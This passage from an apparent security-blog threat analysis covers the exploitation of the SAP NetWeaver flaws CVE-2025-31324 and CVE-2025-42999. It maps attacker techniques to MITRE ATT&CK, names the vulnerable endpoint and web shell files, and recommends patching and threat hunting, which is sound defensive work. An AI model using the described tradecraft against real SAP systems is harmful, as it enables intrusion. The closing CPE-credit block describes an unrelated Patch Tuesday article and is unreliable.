• T1090 – Proxy: Use of reverse SSH SOCKS proxies for C2.6 The NPS tool, an intranet penetration proxy, is also used.2
• T1071.001 – Application Layer Protocol: Web Protocols: Web shells inherently communicate over HTTP/S. SuperShell is a web-based C2 interface.2
• T1573.002 – Encrypted Channel: Asymmetric Cryptography: Use of SoftEther VPN for secure C2 communications.2

• Impact (TA0040):

• T1499.004 – Endpoint Denial of Service: Application Exhaustion Flood: Service disruption through corruption of UDDI entries has been noted as a potential impact.2
• T1486 – Data Encrypted for Impact: The potential for ransomware deployment on compromised SAP systems is a significant concern.7

The specific focus on defense evasion techniques like Heaven’s Gate, obfuscation, and fileless execution highlights a clear intent by attackers to operate stealthily and circumvent common security controls. This makes detection more challenging and shifts the emphasis towards behavior-based and anomaly detection capabilities, rather than relying solely on signature-based methods.

Furthermore, while attackers employ custom tools, many discovery commands are standard OS utilities. When executed under the context of a legitimate SAP server process (e.g., java.exe), distinguishing malicious “Living off the Land” (LotL) activity from benign administrative tasks becomes difficult without proper behavioral baselining and correlation with other indicators of compromise.

Table: Observed MITRE ATT&CK® Techniques

The following table summarizes some of the key ATT&CK techniques observed in the exploitation of these SAP vulnerabilities:

Tactic	Technique ID	Technique Name	Relevance to SAP Attacks (Brief Description & Sources)
Initial Access	T1190	Exploit Public-Facing Application	Exploitation of CVE-2025-31324 on SAP NetWeaver Visual Composer endpoint /developmentserver/metadatauploader. 15
Execution	T1059.007	Command and Scripting Interpreter: Java	Execution of JSP web shells (helper.jsp, cache.jsp, etc.) to run commands on the SAP Java server. 6
Persistence	T1505.003	Server Software Component: Web Shell	Deployment of various web shells (JSP, coreasp.js) for sustained access in SAP directories. 1
Privilege Escalation	T1068	Exploitation for Privilege Escalation	Chaining CVE-2025-31324 with CVE-2025-42999 for privileged RCE; Brute Ratel used for privilege escalation. 1
Defense Evasion	T1027	Obfuscated Files or Information	Garble used for ELF binary obfuscation to hinder analysis. 6
	T1622	Debugger Evasion (Heaven’s Gate)	Heaven’s Gate technique employed to bypass endpoint defenses. 7
Discovery	T1082	System Information Discovery	Attackers running commands like whoami, ipconfig, hostname to gather system details post-compromise. 6
Command and Control	T1105	Ingress Tool Transfer	Downloading post-exploitation tools like Brute Ratel C4, SuperShell, KrustyLoader. 5
	T1090	Proxy	Use of reverse SSH SOCKS proxies; NPS proxy for C2. 6
Impact	T1486	Data Encrypted for Impact	Potential deployment of ransomware on compromised SAP systems, encrypting critical business data. 7

8. Urgent Call to Action: Key Takeaways and Strategic Recommendations

The active exploitation of CVE-2025-31324 and CVE-2025-42999 in SAP NetWeaver Visual Composer presents a clear and present danger to organizations worldwide. The combination of critical severity, sophisticated threat actor involvement, and the potential for complete system compromise necessitates an immediate and comprehensive response.

Recap of Critical Risks:

• Two severe, actively exploited zero-day vulnerabilities (CVE-2025-31324 with CVSS 10.0 and CVE-2025-42999 with CVSS 9.1) affect a core SAP component.
• Highly capable threat actors, including China-nexus APT groups, alongside opportunistic attackers, are leveraging these flaws.
• The vulnerabilities can be chained to achieve unauthenticated remote code execution, leading to full control over targeted SAP systems.
• This poses a high risk of catastrophic data breaches, deployment of ransomware, severe operational disruption, and state-sponsored espionage, particularly impacting critical infrastructure and manufacturing sectors.

Top-Priority Actions:

1. Immediate and Comprehensive Patching: This is the paramount action.

• Apply SAP Security Note 3594142 to address CVE-2025-31324.
• Critically, also apply SAP Security Note 3604119 to address CVE-2025-42999. Both notes are required for full mitigation.
• For older, unsupported SAP NetWeaver versions (7.0-7.40), implement the workarounds detailed in SAP KBA 3593336 as a matter of urgency.

1. Proactive and Thorough Threat Hunting: Due to exploitation preceding patch availability, organizations must assume potential compromise if their systems were exposed.

• Conduct intensive scans for Indicators of Compromise (IoCs), including known web shell names and patterns, suspicious files in SAP directories, anomalous process activity, and unexpected network connections.
• Utilize tools such as the open-source IoC scanner provided by Onapsis and Mandiant.

1. System Hardening and Attack Surface Reduction:

• If SAP NetWeaver Visual Composer (VCFRAMEWORK) is not actively used, disable or uninstall it.
• Strictly limit network access to the /developmentserver/metadatauploader endpoint using firewalls or SAP Web Dispatcher.
• Implement and enforce robust network segmentation to isolate SAP systems.

1. Enhanced Monitoring and Detection Capabilities:

• Ensure SAP system logs (web server, application, security audit) are forwarded to a centralized SIEM for continuous monitoring and correlation.
• Deploy and update NIDS/HIDS signatures and EDR rules specific to these vulnerabilities and associated attacker TTPs.
• Establish baselines for normal SAP server behavior and monitor for deviations, particularly anomalous process creations or network activity originating from SAP processes.

Strategic Recommendations for Long-Term Resilience:

The current threat landscape targeting SAP systems is a stark reminder that these core enterprise applications are high-value targets. Addressing these specific vulnerabilities is not merely a tactical IT task; it is a business risk management imperative that requires C-level visibility and support due to the potential for severe impact on core operations and “crown jewel” data.

• Improve SAP Security Posture Management: Implement a continuous process for reviewing SAP system configurations, installed components (especially add-ons like Visual Composer), and user authorizations. Eliminate or secure unused but potentially vulnerable components.
• Invest in SAP-Specific Security Expertise and Tools: Generic security measures may not provide sufficient visibility or protection for the complexities of SAP environments. Organizations should consider investing in specialized SAP security solutions, threat intelligence feeds, and personnel training.
• Strengthen Incident Response Plans for SAP: Ensure that incident response playbooks specifically address the compromise of critical SAP systems. This includes procedures for containment, eradication, recovery, forensic analysis of SAP logs and artifacts, and business continuity.
• Foster Collaboration and Information Sharing: The rapid discovery and dissemination of threat information by security vendors, researchers, and agencies were crucial in responding to these zero-days. Organizations should actively participate in and consume intelligence from industry-specific ISACs, security communities, and vendor briefings. The “second wave” of attacks demonstrates that threats persist and evolve, making shared intelligence vital.

The tactics observed in these incidents—chaining vulnerabilities, sophisticated C2 mechanisms, and advanced defense evasion techniques—suggest that attackers are becoming increasingly adept at exploiting complex enterprise applications like SAP. This is likely an enduring trend, requiring ongoing adaptation, investment, and vigilance from defenders.

Complacency is not an option when protecting the digital heart of an enterprise. Proactive defense, rapid and thorough response, and a commitment to continuous security improvement are essential to safeguard critical SAP assets from these and future advanced threats.

Works cited

1. SAP releases patch for second zero-day vulnerability in NetWeaver …, accessed May 14, 2025, https://www.techzine.eu/news/security/131374/sap-releases-patch-for-second-zero-day-vulnerability-in-netweaver/
2. Threat Analysis: SAP Vulnerability Exploited in the Wild by Chinese Threat Actor – Forescout, accessed May 14, 2025, https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/
3. Vulnerability — Latest News, Reports & Analysis | The Hacker News, accessed May 14, 2025, https://thehackernews.com/search/label/Vulnerability
4. SAP NetWeaver exploitation enters second wave of threat activity …, accessed May 14, 2025, https://www.cybersecuritydive.com/news/sap-netweaver-exploitation-second-wave/747661/
5. China-Linked APTs Exploit SAP CVE-2025-31324 to Breach 581 Critical Systems Worldwide – The Hacker News, accessed May 14, 2025, https://thehackernews.com/2025/05/china-linked-apts-exploit-sap-cve-2025.html
6. Threat Brief: CVE-2025-31324 – Palo Alto Networks Unit 42, accessed May 14, 2025, https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/
7. CVE-2025-31324 Detection: SAP NetWeaver Zero-Day Under Active Exploitation Exposes Critical Systems to Remote Code Execution | SOC Prime, accessed May 14, 2025, https://socprime.com/blog/detect-cve-2025-31324-exploitation-attempts/
8. Actively Exploited SAP NetWeaver Visual Composer Vulnerability Enables Remote Code Execution (CVE-2025-31324) – SonicWall, accessed May 14, 2025, https://www.sonicwall.com/blog/actively-exploited-sap-netweaver-visual-composer-vulnerability-cve-2025-31324
9. Active Exploitation of SAP NetWeaver Visual Composer CVE-2025 …, accessed May 14, 2025, https://www.rapid7.com/blog/post/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/
10. Chinese hackers exploit SAP vulnerability – Techzine Europe, accessed May 14, 2025, https://www.techzine.eu/news/security/131281/chinese-hackers-exploit-sap-vulnerability/
11. SAP Security Notes: May 2025 Patch Day – Onapsis, accessed May 14, 2025, https://onapsis.com/blog/sap-security-patch-day-may-2025/
12. SAP Security Patch Day – May 2025 – SecurityBridge, accessed May 14, 2025, https://securitybridge.com/blog/sap-security-patch-day-may-2025/
13. CVE-2025-42999 – Insecure Deserialization in SAP NetWeaver (Visual Composer development server) – SecAlerts, accessed May 14, 2025, https://secalerts.co/vulnerability/CVE-2025-42999
14. Critical SAP NetWeaver flaw exploited by suspected initial access broker (CVE-2025-31324), accessed May 14, 2025, https://www.helpnetsecurity.com/2025/04/28/sap-netweaver-cve-2025-31324-exploited/
15. A Vulnerability in SAP NetWeaver Visual Composer Could Allow for Remote Code Execution | Office of Information Technology Services, accessed May 14, 2025, https://its.ny.gov/2025-044
16. How to Defend Against CVE-2025-31324: Critical SAP Zero-Day, accessed May 14, 2025, https://onapsis.com/threat-research/cve-2025-31324/
17. CVE-2025-31324: Active Exploitation of SAP Vulnerability – SecurityBridge, accessed May 14, 2025, https://securitybridge.com/blog/cve-2025-31324/
18. ReliaQuest Uncovers New Critical Vulnerability in SAP NetWeaver, accessed May 14, 2025, https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
19. Critical Zero-Day Vulnerability in SAP NetWeaver – NHS England Digital, accessed May 14, 2025, https://digital.nhs.uk/cyber-alerts/2025/cc-4649
20. SAP Zero Day Vulnerability CVE-2025-31324 / Security Note 3594142, accessed May 14, 2025, https://layersevensecurity.com/sap-zero-day-vulnerability-cve-2025-31324-security-note-3594142
21. CVE-2025-42999 | Tenable®, accessed May 14, 2025, https://www.tenable.com/cve/CVE-2025-42999
22. CVE-2025-42999 – Exploits & Severity – Feedly, accessed May 14, 2025, https://feedly.com/cve/CVE-2025-42999
23. CVE-2025-42999 – vulnerability database, accessed May 14, 2025, https://vulners.com/cve/CVE-2025-42999
24. SAP Patches Another Critical NetWeaver Vulnerability – SecurityWeek, accessed May 14, 2025, https://www.securityweek.com/sap-patches-another-critical-netweaver-vulnerability/
25. CVE-2025-31324: SAP NetWeaver Remote Code Execution Vulnerability Explained, accessed May 14, 2025, https://www.picussecurity.com/resource/blog/cve-2025-31324-sap-netweaver-remote-code-execution
26. China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures – EclecticIQ Blog, accessed May 14, 2025, https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures
27. Threat Actors Hacking SAP Critical Zero-Day – BankInfoSecurity, accessed May 14, 2025, https://www.bankinfosecurity.com/threat-actors-hacking-sap-critical-zero-day-a-28098
28. SAP vulnerability | CVE-2025-31324 – Stormshield, accessed May 14, 2025, https://www.stormshield.com/news/security-alert-sap-cve-2025-31324-stormshield-products-response/
29. Critical vulnerability in SAP NetWeaver under threat of active …, accessed May 14, 2025, https://www.cybersecuritydive.com/news/critical-vulnerability-sap-netweaver-exploitation/746383/
30. Critical Zero-Day Vulnerability in SAP NetWeaver Visual Composer: CVE-2025-31324 Exploited in Manufacturing Attacks – Rescana, accessed May 14, 2025, https://www.rescana.com/post/critical-zero-day-vulnerability-in-sap-netweaver-visual-composer-cve-2025-31324-exploited-in-manufa
31. Netizen: Monday Security Brief (4/28/2024), accessed May 14, 2025, https://www.netizen.net/news/post/6280/netizen-monday-security-brief-4-28-2024
32. Over 1,200 SAP NetWeaver servers vulnerable to actively exploited flaw, accessed May 14, 2025, https://www.bleepingcomputer.com/news/security/over-1-200-sap-netweaver-servers-vulnerable-to-actively-exploited-flaw/
33. Exploited Vulnerability Exposes Over 400 SAP NetWeaver Servers to Attacks, accessed May 14, 2025, https://www.securityweek.com/exploited-vulnerability-exposes-over-400-sap-netweaver-servers-to-attacks/
34. Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell, accessed May 14, 2025, https://thehackernews.com/2025/05/chinese-hackers-exploit-sap-rce-flaw.html
35. Indicators of Compromise Scanner for SAP Zero-Day (CVE-2025-31324) – Onapsis, accessed May 14, 2025, https://onapsis.com/blog/indicators-of-compromise-scanner-for-sap-zero-day-cve-2025-31324/
36. Russian Military Cyber Actors Target US and Global Critical Infrastructure – CISA, accessed May 14, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a
37. Critical vulnerability in SAP NetWeaver enables malicious file uploads – Red Canary, accessed May 14, 2025, https://redcanary.com/blog/threat-intelligence/cve-2025-31324/
38. 3593336 – Unfamiliar files found in SAP NetWeaver Java file system – SAP Support Portal, accessed May 14, 2025, https://userapps.support.sap.com/sap/support/knowledge/en/3593336
39. Critical SAP NetWeaver Vulnerability Exposed: Hackers Suspected of Zero-Day Exploitation, accessed May 14, 2025, https://www.betterworldtechnology.com/post/sap-netweaver-vulnerability-zero-day

We warned you it was deep.    You arent earning those CPE credits for nothing!

Continuing Professional Education (CPE) Credit

Earn CPE credits for reading this Security Blotter article. All Security Blotter articles that come with a Deep Dive section are eligible to earn free CPEs for you, the reader.  Our articles include all issues, incidents, and bulletins to relevant Infosec standards and best practices. We have documented your CPE submission below for your convenience and because we love you (in a platonic way).

Continuing Professional Education (CPE) Credit

Earn CPE credits for reading this Security Blotter article. This piece provides practical and technical insight into zero-day vulnerabilities, privilege escalation, and remote code execution threats targeting core Windows components. It is suitable for professionals maintaining credentials in cybersecurity, risk management, and incident response.

Article Overview

This article provides an in-depth analysis of Microsoft’s May 2025 Patch Tuesday, including the exploitation of five zero-day vulnerabilities, attacker tradecraft, detection strategies, sector-specific mitigation guidance, and prioritization tactics. The content aligns with core topics across security operations, incident response, governance, and software security domains.

• Word Count: 8,143

• URL: https://securityblotter.com/may-2025-patch-tuesday/

• Estimated Read Time: 41 minutes

• CPE Total: 0.75 CPE credits

• Publisher: Security Blotter

• Author: Jonathan Brennan – ISC2 Member ID 555001

🧾 CPE Submission Details

---

📝 Additional Notes

• Other Certifications: This article may qualify for CPE credit with other certifications that recognize professional security education, including CompTIA Security+, GIAC, and vendor-specific programs.

• Disclaimer: Certification holders are responsible for confirming eligibility with their respective certifying bodies. Security Blotter is not affiliated with ISC2, ISACA, EC-Council, or any certification organization and cannot assist with audit documentation or CPE disputes.

• Record Keeping: Save a local copy or PDF of this article, along with your notes or reflections, in case of a future CPE audit.

• Content Removal Notice: Security Blotter reserves the right to update or remove articles at any time.